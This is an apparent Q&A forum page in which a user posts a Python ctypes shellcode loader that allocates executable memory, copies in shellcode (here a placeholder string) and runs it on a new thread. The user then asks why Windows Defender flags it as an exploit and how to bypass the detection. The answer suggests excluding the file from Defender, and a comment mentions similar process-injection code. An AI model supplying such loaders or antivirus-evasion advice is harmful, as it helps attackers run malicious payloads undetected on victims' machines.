0
import ctypes

shellcode = bytearray(b"SHELLCODE WAS HERE")
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))

This code places shellcode in memory and executes it, I understand that this is used in exploits, but my code doesn't exploit !

However, windows defender defines the threat as "Exploit: Python / Leivion.A" Why this is happening and how the trigger can be bypassed ?

Extrenz Arnautov
  • 1
  • I want to add, I don't develop any malware, I don't like the fact that Windows Defender checks the file every time before I save it, it takes time and triggers a threat message. – Extrenz Arnautov Jul 30 '20 at 10:16
  • Ha, I actually just wrote some similar code (although mine is for process injection), and Defender flags it as well. Mine makes more sense because I'm creating a remote thread, which is a little sketchier. I wonder if it doesn't like the word "shellcode"? – Carcigenicate May 01 '21 at 15:18

1 Answers1

-1

Windows Defender tends to mark every file that injects .dll or .exe to process as virus and exploit. You can add your Python file to exclusions in Windows Defender to solve this issue.

zeFree
  • 2,129
  • 2
  • 31
  • 39
Господин Голубь
  • 1